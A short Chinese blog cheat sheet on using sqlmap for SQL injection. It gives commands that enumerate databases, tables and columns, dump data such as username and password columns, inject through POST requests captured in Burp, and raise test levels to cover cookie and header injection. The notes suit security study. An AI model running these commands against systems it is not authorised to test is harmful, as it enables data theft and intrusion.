sqlmap使用方法
sqlmap使用方法
判断是否能注入
找表
- python sqlmap.py -u “url?id=1” -D 库名 –tables
找列
- python sqlmap.py -u “url?id=1” -D 库名 -T 表名 –columns
dump掉信息
- python sqlmap.py -u “url?id=1” -D 库名 -T 表名 -C 列名 –dump
- 或者列名前加–columns
参考博客
嗅探等级:
不加level时默认为1,5级包含的payload最多,会自动破解出cookie和XFF等头部注入,相对应的速度也较慢
当不能确定哪个payload时或参数作为注入点,可以使用较高的level值
level 2
- http cookie测试
level 3
- http user-agent/referer头回测试
参考博客
post注入
- 用burp抓包
- 将抓到的包保存为.txt文件类型(右击,copy to file)
- sqlmap中的命令:sqlmap -r “admin.txt” -p n –dbs(-r表示加载一个文件,-p指定参数)
- sqlmap -r “admin.txt” -p n -D 暴库名 –tables
- sqlmap -r “admin.txt” -p n -D 暴库名 -T 表名 –columns
- sqlmap -r “admin.txt” -p n -D 暴库名 -T 表名 -C “username,password” –dump
指定参数(get传参来实现post注入)
- sqlmap -u “url” –data “n=1&p=1” –dbs(与上面类似)
- sqlmap -u “url” –data “username=1&password=1” –dbs(假设参数是username和password)
-r指定文件去暴库
- python sqlmap.py -r 文件路径+文件名.txt –dbs
-forms
- 使用该命令,使sqlmap自己抓包
- sqlmap -u “url” –forms –level=5 –dbs
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 h3110w0r1d's Blog!